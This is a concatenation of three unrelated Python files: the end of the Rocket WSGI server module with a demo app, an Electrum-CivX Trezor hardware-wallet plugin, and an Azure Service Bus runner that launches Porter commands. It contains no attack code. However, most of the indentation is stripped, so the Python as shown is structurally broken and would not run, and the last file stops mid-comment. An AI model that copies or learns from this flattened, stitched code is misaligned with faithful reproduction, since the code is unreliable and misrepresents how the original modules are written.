"SCRIPT_NAME": "", # Direct call WSGI does not need a name
"wsgi.errors": sys.stderr,
"wsgi.version": (1, 0),
"wsgi.multiprocess": False,
"wsgi.run_once": False,
"wsgi.file_wrapper": FileWrapper,
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get("max_threads") != 1
else:
multithreaded = False
self.base_environ = dict(
{
"SERVER_SOFTWARE": self.app_info["server_software"],
"wsgi.multithread": multithreaded,
}
)
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get("wsgi_app")
if not hasattr(self.app, "__call__"):
raise TypeError(
"The wsgi_app specified (%s) is not a valid WSGI application."
% repr(self.app)
)
# Enable futures
if self.app_info.get("futures"):
executor = self.app_info["executor"]
self.base_environ.update(
{"wsgiorg.executor": executor, "wsgiorg.futures": executor.futures}
)
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
for k, v in self.read_headers(sock_file).items():
environ[str("HTTP_" + k)] = v
# Add CGI Variables
environ["REQUEST_METHOD"] = request["method"]
environ["PATH_INFO"] = request["path"]
environ["SERVER_PROTOCOL"] = request["protocol"]
environ["SERVER_PORT"] = str(conn.server_port)
environ["REMOTE_PORT"] = str(conn.client_port)
environ["REMOTE_ADDR"] = str(conn.client_addr)
environ["QUERY_STRING"] = request["query_string"]
if "HTTP_CONTENT_LENGTH" in environ:
environ["CONTENT_LENGTH"] = environ["HTTP_CONTENT_LENGTH"]
if "HTTP_CONTENT_TYPE" in environ:
environ["CONTENT_TYPE"] = environ["HTTP_CONTENT_TYPE"]
# Save the request method for later
self.request_method = environ["REQUEST_METHOD"]
# Add Dynamic WSGI Variables
if conn.ssl:
environ["wsgi.url_scheme"] = "https"
environ["HTTPS"] = "on"
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ["SSL_CLIENT_RAW_CERT"] = peercert and str(
ssl.DER_cert_to_PEM_cert(peercert)
)
except Exception:
print(sys.exc_info()[1])
else:
environ["wsgi.url_scheme"] = "http"
if environ.get("HTTP_TRANSFER_ENCODING", "") == "chunked":
environ["wsgi.input"] = ChunkedReader(sock_file)
else:
environ["wsgi.input"] = sock_file
return environ
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get("Transfer-Encoding", "").lower() == "chunked"
# Add a Date header if it's not there already
if not "Date" in h_set:
h_set["Date"] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not "Server" in h_set:
h_set["Server"] = HTTP_SERVER_SOFTWARE
if "Content-Length" in h_set:
self.size = int(h_set["Content-Length"])
else:
s = int(self.status.split(" ")[0])
if (s < 200 or s not in (204, 205, 304)) and not self.chunked:
if sections == 1 or self.protocol != "HTTP/1.1":
# Add a Content-Length header because it's not there
self.size = len(data)
h_set["Content-Length"] = str(self.size)
else:
# If they sent us more than one section, we blow chunks
h_set["Transfer-Encoding"] = "Chunked"
self.chunked = True
if __debug__:
self.err_log.debug(
"Adding header..." "Transfer-Encoding: Chunked"
)
if "Connection" not in h_set:
# If the application did not provide a connection header,
# fill it in
client_conn = self.environ.get("HTTP_CONNECTION", "").lower()
if self.environ["SERVER_PROTOCOL"] == "HTTP/1.1":
                # HTTP/1.1 defaults to keep-alive connections
if client_conn:
h_set["Connection"] = client_conn
else:
h_set["Connection"] = "keep-alive"
else:
# HTTP < 1.1 supports keep-alive but it's quirky
# so we don't support it
h_set["Connection"] = "close"
# Close our connection if we need to.
self.closeConnection = h_set.get("Connection", "").lower() == "close"
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug("Sending Headers: %s" % repr(header_data))
self.conn.sendall(header_data.encode("utf8"))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning(
"WSGI app called write method directly. This is "
"deprecated behavior. Please update your app."
)
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = self.error[1]
if isinstance(data, str):
data = data.encode("ISO-8859-1")
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != "HEAD":
try:
if self.chunked:
self.conn.sendall(b"%x\r\n%s\r\n" % (len(data), data))
else:
self.conn.sendall(data)
except socket.timeout:
self.closeConnection = True
except socket.error:
# But some clients will close the connection before that
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
"""Store the HTTP status and headers to be sent when self.write is
called."""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise # pylint: disable=misplaced-bare-raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if not isinstance(status, str):
self.status = str(status, "ISO-8859-1")
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ("500 Internal Server Error", "HTTP Headers should be bytes")
self.err_log.error(
"Received HTTP Headers from client that contain"
" invalid characters for Latin-1 encoding."
)
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug("Getting sock_file")
# Build our file-like object
sock_file = conn.makefile(mode="rb", buffering=BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get("HTTP_EXPECT", "") == "100-continue":
res = environ["SERVER_PROTOCOL"] + " 100 Continue\r\n\r\n"
conn.sendall(res.encode("utf8"))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, "__len__") and not hasattr(output, "__iter__"):
self.error = (
"500 Internal Server Error",
"WSGI applications must return a list or " "generator type.",
)
if hasattr(output, "__len__"):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if not self.headers_sent:
# Send headers if the body was empty
self.send_headers("", sections)
if self.chunked and self.request_method != "HEAD":
# If chunked, send our final chunk length
self.conn.sendall(b"0\r\n\r\n")
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug("Finally closing output and sock_file")
if hasattr(output, "close"):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket/methods/wsgi.py
def demo_app(environ, start_response):
types = {
"htm": "text/html",
"html": "text/html",
"gif": "image/gif",
"jpg": "image/jpeg",
"png": "image/png",
"pdf": "applications/pdf",
}
if os.path.exists("static"):
static_folder = os.path.join(os.getcwd(), "static")
path = os.path.join(static_folder, environ["PATH_INFO"][1:] or "index.html")
        content_type = types.get(path.split(".")[-1], "text/plain")
        if os.path.exists(path):
            try:
                data = open(path, "rb").read()
                start_response("200 OK", [("Content-Type", content_type)])
except IOError:
start_response("404 NOT FOUND", [])
data = "404 NOT FOUND"
else:
start_response("500 INTERNAL SERVER ERROR", [])
data = "500 INTERNAL SERVER ERROR"
else:
start_response("200 OK", [("Content-Type", "text/html")])
data = "<html><body><h1>Hello from Rocket Web Server</h1></body></html>"
return [data]
def demo():
from optparse import OptionParser
parser = OptionParser()
parser.add_option(
"-i",
"--ip",
dest="ip",
default="127.0.0.1",
help="ip address of the network interface",
)
parser.add_option(
"-p", "--port", dest="port", default="8000", help="post where to run web server"
)
parser.add_option(
"-s",
"--static",
dest="static",
default=None,
help="folder containing static files",
)
(options, args) = parser.parse_args()
global static_folder
static_folder = options.static
print("Rocket running on %s:%s" % (options.ip, options.port))
r = Rocket3((options.ip, int(options.port)), "wsgi", {"wsgi_app": demo_app})
r.start()
if __name__ == "__main__":
demo()
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_civx.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_civx.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_civx import constants
from electrum_civx.i18n import _
from electrum_civx.plugin import BasePlugin, Device
from electrum_civx.transaction import deserialize, Transaction
from electrum_civx.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_civx.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "CivX Testnet" if constants.net.TESTNET else "CivX"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
runner.py
|
import threading
from typing import Optional
from multiprocessing import Process
import json
import socket
import asyncio
import logging
import sys
from resources.commands import build_porter_command, build_porter_command_for_outputs
from shared.config import get_config
from resources.helpers import get_installation_id
from resources.httpserver import start_server
from shared.logging import disable_unwanted_loggers, initialize_logging, get_message_id_logger, shell_output_logger # pylint: disable=import-error # noqa
from resources import strings, statuses # pylint: disable=import-error # noqa
from contextlib import asynccontextmanager
from azure.servicebus import ServiceBusMessage, NEXT_AVAILABLE_SESSION
from azure.servicebus.exceptions import OperationTimeoutError, ServiceBusConnectionError
from azure.servicebus.aio import ServiceBusClient, AutoLockRenewer
from azure.identity.aio import DefaultAzureCredential
def set_up_logger(enable_console_logging: bool) -> logging.LoggerAdapter:
# Initialise logging
logger_adapter = initialize_logging(logging.INFO, socket.gethostname(), enable_console_logging)
disable_unwanted_loggers()
return logger_adapter
def set_up_config(logger_adapter: logging.LoggerAdapter) -> Optional[dict]:
try:
config = get_config(logger_adapter)
return config
except KeyError as e:
logger_adapter.error(f"Environment variable {e} is not set correctly...Exiting")
sys.exit(1)
@asynccontextmanager
async def default_credentials(msi_id):
"""
Context manager which yields the default credentials.
"""
credential = DefaultAzureCredential(managed_identity_client_id=msi_id) if msi_id else DefaultAzureCredential()
yield credential
await credential.close()
async def receive_message(service_bus_client, logger_adapter: logging.LoggerAdapter, config: dict):
"""
This method is run per process. Each process will connect to service bus and try to establish a session.
If messages are there, the process will continue to receive all the messages associated with that session.
If no messages are there, the session connection will time out, sleep, and retry.
"""
q_name = config["resource_request_queue"]
while True:
try:
logger_adapter.info("Looking for new session...")
# max_wait_time=1 -> don't hold the session open after processing of the message has finished
async with service_bus_client.get_queue_receiver(queue_name=q_name, max_wait_time=1, session_id=NEXT_AVAILABLE_SESSION) as receiver:
logger_adapter.info("Got a session containing messages")
async with AutoLockRenewer() as renewer:
# allow a session to be auto lock renewed for up to an hour - if it's processing a message
renewer.register(receiver, receiver.session, max_lock_renewal_duration=3600)
async for msg in receiver:
result = True
message = ""
try:
message = json.loads(str(msg))
logger_adapter.info(f"Message received for resource_id={message['id']}, operation_id={message['operationId']}, step_id={message['stepId']}")
message_logger_adapter = get_message_id_logger(message['operationId']) # correlate messages per operation
result = await invoke_porter_action(message, service_bus_client, message_logger_adapter, config)
                        except (json.JSONDecodeError) as e:
                            logging.error(f"Received bad service bus resource request message: {e}")
                            # Skip further handling of an undecodable message; it will be
                            # redelivered (and eventually dead-lettered) by Service Bus.
                            continue
if result:
logging.info(f"Resource request for {message} is complete")
else:
logging.error('Message processing failed!')
logger_adapter.info(f"Message for resource_id={message['id']}, operation_id={message['operationId']} processed as {result} and marked complete.")
await receiver.complete_message(msg)
logger_adapter.info("Closing session")
await renewer.close()
except OperationTimeoutError:
# Timeout occurred whilst connecting to a session - this is expected and indicates no non-empty sessions are available
logger_adapter.info("No sessions for this process. Will look again...")
except ServiceBusConnectionError:
# Occasionally there will be a transient / network-level error in connecting to SB.
logger_adapter.info("Unknown Service Bus connection error. Will retry...")
except Exception:
# Catch all other exceptions, log them via .exception to get the stack trace, sleep, and reconnect
logger_adapter.exception("Unknown exception. Will retry...")
async def run_porter(command, logger_adapter: logging.LoggerAdapter, config: dict):
"""
Run a Porter command
"""
proc = await asyncio.create_subprocess_shell(
''.join(command),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
env=config["porter_env"])
stdout, stderr = await proc.communicate()
logging.info(f'run porter exited with {proc.returncode}')
result_stdout = None
result_stderr = None
if stdout:
result_stdout = stdout.decode()
shell_output_logger(result_stdout, '[stdout]', logger_adapter, logging.INFO)
if stderr:
result_stderr = stderr.decode()
shell_output_logger(result_stderr, '[stderr]', logger_adapter, logging.WARN)
return (proc.returncode, result_stdout, result_stderr)
def service_bus_message_generator(sb_message: dict, status: str, deployment_message: str, outputs=None):
"""
Generate a resource request message
"""
installation_id = get_installation_id(sb_message)
message_dict = {
"operationId": sb_message["operationId"],
"stepId": sb_message["stepId"],
"id": sb_message["id"],
"status": status,
"message": f"{installation_id}: {deployment_message}"}
if outputs is not None:
message_dict["outputs"] = outputs
resource_request_message = json.dumps(message_dict)
return resource_request_message
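# Illustrative note (not part of the runner): shape of the JSON produced above.
# Values are placeholders; "outputs" is only present when outputs is not None.
#
#   {
#       "operationId": "<operationId from the request message>",
#       "stepId": "<stepId from the request message>",
#       "id": "<resource id from the request message>",
#       "status": "<status string passed in>",
#       "message": "<installation id>: <deployment message>",
#       "outputs": [ ... ]
#   }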
async def invoke_porter_action(msg_body: dict, sb_client: ServiceBusClient, message_logger_adapter: logging.LoggerAdapter, config: dict) -> bool:
"""
Handle resource message by invoking specified porter action (i.e. install, uninstall)
"""
installation_id = get_installation_id(msg_body)
action = msg_body["action"]
message_logger_adapter.info(f"{installation_id}: {action} action starting...")
sb_sender = sb_client.get_queue_sender(queue_name=config["deployment_status_queue"])
# If the action is install/upgrade, post message on sb queue to start a deployment job
if action == "install" or action == "upgrade":
resource_request_message = service_bus_message_generator(msg_body, strings.RESOURCE_STATUS_DEPLOYING, "Deployment job starting")
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
    # Build and run porter command (flagging whether it's a built-in or custom action so we can adapt the porter command appropriately)
is_custom_action = action not in ["install", "upgrade", "uninstall"]
porter_command = await build_porter_command(config, message_logger_adapter, msg_body, is_custom_action)
returncode, _, err = await run_porter(porter_command, message_logger_adapter, config)
# Handle command output
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n')) + " ; Command executed: ".join(porter_command)
resource_request_message = service_bus_message_generator(msg_body, statuses.failed_status_string_for[action], error_message)
# Post message on sb queue to notify receivers of action failure
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: Porter action failed with error = {error_message}")
return False
else:
# Get the outputs
# TODO: decide if this should "fail" the deployment
_, outputs = await get_porter_outputs(msg_body, message_logger_adapter, config)
success_message = f"{action} action completed successfully."
resource_request_message = service_bus_message_generator(msg_body, statuses.pass_status_string_for[action], success_message, outputs)
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: {success_message}")
return True
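# invoke_porter_action flow summary: for install/upgrade a "deploying" status is posted
# first, then the porter command runs; on a non-zero exit code a failed status carrying
# the captured stderr is posted and False is returned, otherwise the porter outputs are
# fetched and a success status carrying them is posted.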
async def get_porter_outputs(msg_body: dict, message_logger_adapter: logging.LoggerAdapter, config: dict):
"""
Get outputs JSON from a Porter command
"""
porter_command = await build_porter_command_for_outputs(msg_body)
returncode, stdout, err = await run_porter(porter_command, message_logger_adapter, config)
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n'))
message_logger_adapter.info(f"{get_installation_id(msg_body)}: Failed to get outputs with error = {error_message}")
return False, ""
else:
outputs_json = {}
try:
outputs_json = json.loads(stdout)
message_logger_adapter.info(f"Got outputs as json: {outputs_json}")
except ValueError:
message_logger_adapter.error(f"Got outputs invalid json: {stdout}")
return True, outputs_json
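# get_porter_outputs return contract: (True, <parsed outputs JSON>) on success, (False, "")
# when the porter command fails; invoke_porter_action forwards the second element as the
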